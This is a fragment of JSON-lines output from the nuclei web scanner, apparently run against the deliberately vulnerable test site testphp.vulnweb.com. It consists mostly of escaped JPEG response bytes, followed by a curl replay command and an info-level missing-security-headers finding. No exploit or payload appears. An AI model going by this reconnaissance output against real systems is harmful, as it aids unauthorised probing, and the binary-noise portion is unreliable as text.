ufffd\\ufffd\\ufffd\\ufffd \\ufffd~\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdeH\\u0016\\u0015!\\ufffd\\u001c\\ufffdrc\\ufffd\\ufffd\\\"eo\\ufffd\\ufffd\\ufffd׌\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c!)\\u000eO\\ufffd\\ufffd\\u001b\\ufffdttQ\\ufffd\\ufffdp\\u000cq\\ufffd#2\\ufffdԜ\\u0003\\ufffd\\u0007?\\ufffd\\ufffd[\\ufffd\\ufffd\\u0000\\ufffd5]Z\\ufffdDp\\ufffd\\ufffd6KHi\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd k\\ufffdC\\ufffd\\ufffd\\u000bURW%1h\\ufffdf\\ufffd0LNHʹ\\u0005pp\\ufffd[$\\u00128\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4k4k\\u000ctp\\ufffdQ\\ufffdj\\u0014\\u0006\\u0005\\ufffd\\ufffd\\ufffd\\u0004d\\ufffdb\\u003e\\ufffd\\ufffd\\u0000涁d1\\u0019^I;_/u\\ufffd`\\ufffdU\\ufffdϾ\\ufffdPO\\ufffd(\\u001eڪ\\ufffdSb'\\n9\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdQ\\ufffd\\u001bco\\ufffdV\\ufffd\\ufffd(\\ufffdo.\\ufffd`\\u001e\\ufffd砺\\ufffd\\ufffd=\\u001bU4\\ufffd_s\\ufffd\\ufffd\\ufffd̴\\ufffd0H\\ufffd`\\ufffd]\\ufffd%\\ufffdڛd9\\u001e\\ufffd\\ufffdǖ\\ufffdjΣ\\ufffd{\\ufffd\\ufffd\\ufffd%m\\ufffd\\ufffd$\\ufffd\\ufffdMٍ\\ufffdi\\ufffdA\\ufffd~\\u0000\\u0000\\ufffd\\u0007 \\ufffd\\ufffdg!\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffdG'|\\ufffdL\\ufffd\\ufffd\\u0015\\ufffdU5\\ufffd\\ufffdF\\u0019\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd^K\\u0013C̣-9\\ufffdm\\u0015\\u003cw\\u0010\\ufffd\\u0019\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd|A\\ufffdZ\\ufffd\\ufffdqhb\\ufffd\\ufffdX)\\ufffd\\ufffdV.\\ufffd\\n$\\ufffd\\ufffdV\\ufffd\\ufffd\\u003e\\ufffdAb\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffdH\\ufffdե\\ufffd\\ufffdnL\\ufffd\\ufffd!M\\ufffd\\ufffd\\ufffd#:=\\ufffd-Cp4\\ufffd\\ufffdV\\ufffd\\ufffde\\ufffdd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd$\\ufffd]\\ufffd9\\u000c\\ufffd\\u0001\\ufffd\\u003cc\\u001ccZGZOWm\\ufffd\\ufffd\\ufffd\\ufffdVe\\ufffd\\ufffd\\ufffd5c*\\u0026\\ufffd\\u0000\\ufffdO\\ufffdn\\ufffd9\\u003c\\ufffd\\ufffd\\ufffd\\ufffd5΢\\ufffdݣ9\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdMyBQ\\ufffdwY\\ufffdw\\ufffd*\\u000c\\u0001fWڏ\\u000e\\ufffd\\ufffd\\u0012\\ufffd\\ufffd\\u0019\\ufffd8]\\ufffda\\u0019\\u0004\\ufffd\\ufffd\\u0000\\u001fQ[SU\\ufffd\\ufffd\\ufffd\\u001c\\u0014\\ufffdћ\\\\Tp\\\\.\\u0017j\\ufffdV\\ufffd\\ufffd\\ufffd!\\u000b\\u0012\\ufffdQcUe-\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdP\\u0000;\\ufffd\\ufffd\\ufffd\\ufffdE4d\\ufffd)h\\ufffd\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd \\u0012\\u0001ǶH\\ufffd\\ufffduk}ɵ-.\\ufffd\\ufffd\\ufffd\\ufffdgO\\ufffd\\ufffd7;G\\ufffd\\ufffd\\ufffd-ӿs\\ufffdN\\ufffdVDA\\u0019ld\\ufffdJ\\ufffd2\\u0000$\\u0003\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffd7U.\\ufffdY%\\ufffd\\ufffdZ%\\ufffd\\ufffd\\ufffd\\ufffd\\ufffde\\ufffd\\u0003~\\u003eV%X\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\ufffd\\u0018%z\\ufffdWM;F\\ufffdv\\u001f\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdé\\ufffd\\ufffd\\ufffd\\ufffd}?UCp\\ufffd[\\ufffdvj\\ufffdTn\\ufffd\\ufffd~\\ufffdɂ\\ufffdF1\\ufffd\\ufffd\\ufffd\\ufffdO,t\\ufffd\\ufffdq\\ufffd\\u0008\\ufffd\\ufffdϏ\\ufffdT\\ufffd\\ufffdm\\ufffd\\ufffd8;\\ufffd\\ufffd+A\\ufffdKUl\\ufffdW$\\ufffd{c\\ufffd;\\ufffd\\ufffdȩj'W\\u0006\\u0005A\\ufffd\\u001bҪIS\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\rc\\u0015\\u0015\\ufffd_\\ufffd\\ufffd\\ufffdqV\\u001d\\ufffdaI6\\u0000\\u000e\\ufffd\\ufffd]\\ufffd\\r\\ufffdU\\ufffd\\ufffd\\ufffd\\n\\ufffd[WY]h\\ufffdJ\\ufffd\\ufffdm\\ufffd\\ufffdWYd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd(\\ufffd\\ufffdQ\\u0013v\\ufffd\\ufffd@_\\ufffdQ\\ufffd\\ufffds\\ufffdܱ\\ufffd\\ufffd5\\ufffd\\ufffdA\\u0007b\\ufffd\\ufffd9h\\ufffd+$\\ufffdUWA\\ufffdHm\\ufffdGX\\ufffd\\u0003\\u0003f\\ufffdƒ\\ufffd\\ufffdY%\\ufffd\\ufffd\\ufffd\\ufffd.'\\u0019=3\\ufffd\\ufffd\\ufffd\\u0015E\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdA\\ufffdx^E\\ufffd\\ufffd\\ufffd@'\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u001af\\u001bF\\ufffd\\ufffd6\\ufffd\\ufffd@\\ufffd\\u003c\\ufffd\\\",c\\ufffd\\ufffdJ)c\\ufffd!|\\u000c\\ufffdg\\ufffd\\u0001\\ufffd\\ufffd\\ufffd%\\ufffd\\u000f\\ufffd\\ufffdm!xo\\ufffd\\u0000\\ufffd\\\\\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffd\\u003cU\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\r\\ufffd\\ufffdOG\\u0019\\ufffdD\\ufffd3\\ufffdF|\\ufffdi\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\r\\u001fv\\ufffd\\ufffdX;\\ufffd\\ufffdh{\\ufffd\\ufffd\\ufffd\\\\\\u0005]\\ufffdrJ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffd;!\\ufffd\\ufffd\\\"\\ufffdv\\ufffdz\\ufffdV+\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffdV\\ufffd\\ufffd\\ufffdxRV=Ѝ\\ufffd\\u0004\\ufffd\\ufffdD\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\u0015$\\ufffdM\\ufffd\\ufffd:\\u0003\\ufffdT\\ufffd\\ufffd\\ufffdۜ\\ufffd\\ufffd[;\\ufffd\\u0010IfR\\ufffdN\\u000b\\u001e[\\ufffd\\u0006p\\u003ch\\ufffd)\\ufffd#Ս\\u000fo|\\ufffd\\u0010e:\\ufffd|\\ufffd\\u0011\\ufffd\\ufffdc\\ufffd\\ufffd\\u0010\\ufffd}\\ufffduf\\ufffd\\u000cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-Mgj\\u0026bx\\u0003?MA\\ufffd\\ufffde\\u000c$\\ufffdH$\\u001c4r.\\ufffdS\\ufffdy\\u0007\\ufffd\\u001f\\ufffd\\ufffdt\\ufffd\\u0007\\ufffd:\\ufffdc\\ufffdyo\\u0018\\u001a\\u0005\\\"\\ufffd\\ufffd\\u001b\\ufffd\\ufffd5c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\u000e\\u000f\\ufffd\\ufffdЕ\\\\\\ufffdT\\ufffd\\ufffd[N\\ufffd\\ufffd;\\ufffd\\ufffd*\\ufffdi\\ufffd\\ufffdU\\ufffd\\u0000e\\ufffd$c \\ufffdyʰP\\ufffd\\ufffd[\\u00168\\ufffd\\ufffd\\u0014\\u0014o\\ufffd\\u003c=\\u0013\\ufffdSG\\u001f\\u000c\\ufffd3\\ufffd\\u0002|ꅪ袞W\\ufffd\\ufffdZр\\ufffd;\\ufffd\\u001e\\u0018{6\\u003ed?\\ufffd\\u0006\\u001b\\ufffd\\ufffd\\ufffd\\ufffd}_\\ufffd\\ufffdY\\u001fn\\ufffdR\\ufffdH\\u0003,sQwx`\\u0000;\\u001dH \\ufffd\\u0018\\ufffd\\ufffd\\u0004{\\u001d\\u0015^\\ufffdn\\ufffd\\ufffd\\ufffdvJ\\ufffd=\\u001a\\u001b\\ufffdD\\ufffd\\ufffd2mٖ*@E\\u0001\\ufffd*\\u000cP\\u0007\\ufffdF2F\\ufffdnW8\\ufffd\\u000c' \\ufffdd\\u001d\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdo\\u0017Q\\ufffd[t\\u000f\\ufffdj\\ufffd\\ufffd\\ufffde\\u0013R\\ufffdOGN\\ufffdݎ\\ufffd\\u0011\\u001231J\\ufffd!US\\ufffd2\\u0008\\ufffd\\ufffdr\\t'ZM\\ufffd\\ufffdYx\\ufffd\\ufffdd\\u0011\\ufffd\\ufffdW\\ufffdY\\ufffd*e_F\\u0019\\u0015\\ufffd\\ufffdh\\ufffd\\ufffdK\\u0002\\ufffd\\ufffd\\ufffdIпº\\ufffdT\\r;\\ufffdf\\ufffd\\ufffd\\ufffdQ+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd;{{\\ufffd\\u0000g\\ufffd\\u00060\\ufffdc\\ufffdt۽eB[n]\\ufffdI\\ufffd\\ufffdPc\\u000b\\u0018\\u0007\\u0001pp\\u000f\\ufffd\\u00089\\ufffd\\ufffd\\ufffd\\ufffd\\u0005d\\ufffd\\u0013?\\ufffd\\ufffd\\u0001\\ufffd\\ufffds\\ufffd\\ufffd׿\\ufffd4T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|J\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\u0015\\ufffd6\\ufffd\\ufffd\\ufffdi\\u0016)\\ufffd\\ufffd\\ufffd\\u0001e\\ufffd\\ufffdrB\\ufffd\\u0007\\ufffd\\ufffd\\u000c\\u0002\\u00179\\u0004\\u0003\\ufffdz:\\ufffd\\ufffd\\ufffdG/e@\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffdj\\ufffd\\ufffd=\\u00038P?P\\ufffd\\ufffd\\u003e\\u0017\\u001bpwj\\ufffd\\ufffd\\u0015l7\\u001b\\u001d\\ufffd\\u000b\\ufffd(\\ufffd\\ufffd\\u0011\\u0011hX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001f(\\r\\ufffdb\\u0014\\ufffd\\ufffd\\u0017\\u0019k\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdjAFn\\ufffdR1\\ufffdR\\ufffd!\\ufffd=\\ufffdn\\ufffdh-\\ufffd8\\ufffd=@s\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd7G\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP5\\u0014\\ufffdԞ'\\u0015\\ufffdݮL\\ufffd)G }\\ufffdI֫\\ufffd\\ufffd\\ufffdg\\u0002\\ufffd\\ufffd\\u0005\\ufffd\\ufffdcC\\u0015K\\ufffdd\\ufffdϾ\\u003e\\ufffdi\\ufffd'v͏\\ufffd\\ufffd\\u000c\\ufffd\\t\\ufffd\\ufffd#w_\\ufffd\\ufffd\\ufffd:k$\\ufffd\\ufffdֺ\\ufffd\\ufffd\\ufffdI\\u0017a@\\u000c\\ufffd͂\\ufffd\\u0001l\\ufffd2\\ufffd3\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4v0\\ufffd\\ufffd02\\ufffd\\ufffd\\ufffd\\ufffd\\u0001$\\u001e\\ufffd\\ufffdާ\\ufffd\\ufffd\\ufffdʐq\\ufffd*L\\ufffd\\\\\\u0005{DP\\ufffdWi\\ufffd\\ufffdV\\ufffd*AK\\ufffd\\ufffdʛ\\ufffd-$S\\ufffdL\\ufffd5\\ufffd\\u0008\\ufffd\\ufffdI\\u0004\\u000f\\u001c\\ufffde\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffdX2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#`\\u001c\\ufffd\\ufffd[`\\u003e\\ufffd\\ufffd`\\ufffd\\ufffd1*\\ufffd{\\ufffd\\ufffd1b\\u0014\\ufffdT\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffdG\\ufffd\\u000c[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4\\ufffdY]\\ufffdE\\u0010\\ufffd!\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd\\u0000\\u000f\\ufffd\\ufffd\\u0015\\u001c\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\u000bE(\\ufffd\\ufffd\\ufffdq\\ufffd\\u003c\\ufffd\\ufffd\\ufffdΓ\\u003c#\\u0019E\\ufffd\\ufffd\\u0000\\ufffd\\u0007\\ufffd՜S}1\\ufffd\\u001d\\u0008Q\\ufffdIRf\\u0014\\ufffd\\n\\ufffdK\\ufffdy\\ufffd\\u0010\\ufffd\\ufffd0\\ufffd\\ufffd\\u0008\\u0018\\ufffd\\ufffdd\\ufffd\\ufffd8\\ufffd\\ufffd3\\ufffdu\\ufffdH\\ufffd\\ufffd\\u00063\\\"\\ufffd\\u001e\\ufffd\\u0004\\ufffdG\\ufffd\\u000c\\t\\u0007\\ufffdi\\ufffdU\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-ҵ\\ufffd\\ufffd\\r\\u0011\\u0014\\ufffdq\\ufffd\\ufffd\\ufffd-ܳ\\ufffd\\ufffdR\\u00179S\\ufffdX\\ufffdA\\ufffd\\u0006\\u001c0#ʌ\\ufffdFG\\ufffdA\\ufffd\\ufffd\\u001fC\\ufffdB\\ufffd\\ufffdc\\ufffdkl\\ufffd\\ufffd0\\ufffd\\ufffd\\u0015\\ufffd\\ufffd:\\u0019\\u0003۸U\\ufffd3Av\\ufffd]\\ufffd\\ufffdZ\\ufffdyv\\ufffd\\ufffd\\ufffd0dm\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffdv.p\\u0006\\\\~ڕOr\\ufffdE\\ufffd\\ufffd\\ufffd\\t)\\ufffd\\ufffd\\u001b\\ufffd\\t$\\u001b{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:32.073400539Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\